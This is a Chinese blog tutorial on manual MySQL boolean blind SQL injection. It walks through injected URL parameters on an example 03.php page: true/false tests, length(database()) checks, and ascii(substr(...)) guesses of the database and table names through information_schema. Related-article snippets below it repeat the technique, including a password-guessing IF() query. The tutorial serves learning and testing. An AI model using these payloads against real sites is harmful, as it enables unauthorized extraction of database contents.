MySQL布尔盲注

最新推荐文章于 2024-07-09 21:13:18 发布
最新推荐文章于 2024-07-09 21:13:18 发布
阅读量248 收藏
点赞数 1
分类专栏: web安全 文章标签: sql mysql php 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fdhdgsdfdsa/article/details/114639768
版权

盲注是注入的一种方式,是在页面只返回true和false时使用。
需要准备PHP知识

Length()函数 返回字符串的长度
Substr()截取字符串
Ascii()返回字符的ascii码

以上每个函数都可使用,但有可能被禁用,可选其他函数测试
一、判断是否存在盲注
可能需要闭合及注释操作,此处未演示

03.php?id=1 and 1=1

正常显示

03.php?id=1 and 1=2

什么都不显示,也不返回报错
此时存在盲注

二、进行范围测试

有布尔盲注页面只返回true及false两种页面,只能通过PHP函数猜解
1.一一猜解数据库名长度

03.php?id=1 and (length(database()))>10

当前数据库database()的长度大于10,返回true页面,否则FALSE页面。

2.猜当前数据库第一个字母的ASCII值

03.php?id=1 and ascii(substr(database(),1,1))>114

用substr函数截取database数据库第一字母1长度的数据比较出ASCII值为105,为i。修改substr(database(),2,1)可猜第二个字母,之后按字符长度逐个猜出.这条语句在后台为:

SELECT * FROM iweb WHERE id=1 and ascii(substr(database(),1,1))>114

此为无需闭合语句演示
3.猜出当前数据库的表名的第一个字母的ASCII值
用substr函数截取并用select查询database数据库中表名(0偏移量,第1行的表名)第一字母1长度的数据比较出ASCII值为115,为i。修改substr(~~~~,2,1)可猜第二个字母,之后按字符长度逐个猜出

03.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>114

4.猜出所选表下的所有字段

5.猜出所选字段下的数据

盲注用手工注入太费时,需配合工具使用,如kali、脚本,此为命令演示

fdhdgsdfdsa
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql数据库布尔盲注_mysql注入-布尔盲注总结
weixin_28956075的博客
02-05 557
mysql布尔盲注总结布尔盲注常用函数:length()字符串长度判断left(a,b)从左侧截取a的前b位substr(a,b,c)从b位置开始,截取字符串a的c长度。ascii()将某个字符转换成相应的ascii码值。mid(a,b,c)从位置b开始,截取a字符串的c位ord函数与ascii()函数类似,将某个字符转换成相应的ascii码值。regrexp正则注入limit使用方法:limi...
MySQL布尔盲注
一个普普通通的博客
03-01 1487
Mysql注入—布尔盲注
MySQL手注之布尔盲注详解
最新发布
m0_52484587的博客
07-09 266
说明存在注入,而且是字符型的注入!(如果是数字型的注入,那么就不用去闭合单引号)但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。这时,我们无法根据应用程序的返回页面得到我们需要的。基于布尔SQL盲注即在SQL注入过程中,应用程序仅仅返回。说明当前数据库名长度为。
mysql 布尔盲注_Mysql 高级盲注布尔盲注sqli blind】
weixin_36381298的博客
02-07 244
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔盲注做详细说明,关于其它的技巧,后续还会再单...
mysql bool盲注_大哥带我们的mysql注入 基于bool的盲注
weixin_42332131的博客
01-18 98
盲注 那么我们来了解一点盲注的语法这里面是语法的介绍https://blog.csdn.net/alex_seo/article/details/821489550X01第一步我们先判断当前数据库的长度语法构造/index.php?id=1%20and%20length((select%20database()))%3E3 正确index.php?id=1 and length((select d...
mysql-blind(高级盲注+基于布尔).docx
01-23
MySQL 高级盲注布尔盲注详解】 MySQL盲注,特别是布尔盲注,是一种在目标页面无明显回显时检测SQL注入漏洞的技术。这种技术源于某些网站的错误处理机制使得常规的UNION查询无法直接揭示数据字段。盲注...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入等
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
Web应用安全:Mysql盲注.pptx
06-19
3. **基于布尔MySQL盲注** - **非正则匹配注入**:利用`LEFT()`, `MID()`, `SUBSTR()`等函数构造查询,结合逻辑运算符(如`AND`、`OR`)来判断数据的存在性。 - **正则匹配注入 & LIKE 注入**:使用`REGEXP`进行...
Web应用安全:Mysql盲注文本.docx
06-17
**一、基于布尔MySQL盲注** 这种盲注方法依赖于SQL语句执行后的真假判断。常用的逻辑函数包括`left()`, `mid()`和`substr()`。 1. **`left()`函数**:用于从字符串左边开始截取一定长度的字符。例如,`left...
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
MYSQL布尔盲注手工注入笔记
GiDunPar的博客
02-02 1168
布尔盲注就是存在注入的页面没有回显,没办法用select 1,2,3....#来判断页面的回显 只能用对和错了一点一点注入 用到的函数: length(str) 返回指定字符串的长度 substr(str,pos,len)/substring(str,pos,len)...
sql注入知识---布尔盲注
尘玥的故事
04-08 556
一般的情况下我们面对这种盲注都是写脚本跑(提前准备然后更具具体的情况再改脚本)表现:会对你的输出进行显示正确错误,但不会报错。通过返回的正确与否来判断数据库的每个字母。
MySQL手工布尔盲注
L_KevinK的博客
08-03 443
MySQL手工布尔盲注(1)测试注入点(2)爆数据库相关信息 (1)测试注入点 1)链接后加 ’ 号页面报错,爆出错误信息 2)链接后加 ’ and 1=1–+ 返回页面正常 3)链接后加 ’ and 1=2–+ 返回页面错误 (2)爆数据库相关信息 1)使用 order by 语句爆出表字段数为8 2)使用 union select 发现语句报错,此时不能使用联合查询语句,于是想到了布尔...
教科书般的mysql布尔盲注(附验证脚本)
qq_35855403的博客
08-16 1662
遇到一收费外挂,登录处抓包http://115.159.147.96/ap_Verify.php?a=nb&user=asdasdasdas&pass=A3DCB4D229DE6FDE0DB5686DEE47145D&key=8E7CACDD62339A1D7A100347055D9104&ver=163&soft=VM&num=EJGDCHHCDX...
mysql bool盲注_bool盲注+各种姿势绕过过滤和替换
weixin_35019679的博客
01-27 809
题目来源题目界面比较简单,只让你输入id,输对了告诉你 You are in,输错了就 You are not in可以想到这是一个盲注,经简单测试,提交字母a进不去,1可以。也就是说通过注入如果进去了,说明注入的语句成功执行,反之没有执行,典型的bool盲注bool盲注的一般思路一般来说,bool盲注通常是通过一位一位爆破字符来实现的,常用的函数如下:1234567891011121314151...
mysql注入入门_sql注入入门之mysql布尔盲注
weixin_31727797的博客
02-19 144
1,实例 mysql 盲注点,如下,虽然这并不是个标标准准的盲注点,但并不影响我们用盲注的方式来获取1、http://www.vuln.com/wexpage.php?id=212,一阵单引号过后,目标1、http://www.vuln.com/wexpage.php?id=21'3,尝试闭合,还是前面的问题,不要一眼看到数字就认定它是个数字型注入,比如该实例就又是个字符型注入,我们只需闭合前面的...
mysql bool盲注_Mysql 高级盲注布尔盲注sqli blind】
weixin_39971132的博客
01-18 173
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔盲注做详细说明,关于其它的技巧,后续还会再单...
mysql手工布尔盲注
10-13
布尔盲注是一种常见的SQL注入攻击方式,可以通过构造特定的SQL语句来获取数据库中的敏感信息。手工布尔盲注是指通过手动构造SQL语句来进行盲注攻击,而非使用自动化工具。 在MySQL中,可以使用IF函数来进行布尔盲注攻击。IF函数的语法如下: IF(expr1,expr2,expr3) 如果expr1为真,则返回expr2,否则返回expr3。 例如,假设我们要获取数据库中名为“admin”的用户的密码,可以使用如下语句进行布尔盲注攻击: SELECT IF((SELECT password FROM users WHERE username='admin')='123456', 'true', 'false') 如果返回结果为“true”,则说明密码为“123456”,否则密码不是“123456”。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值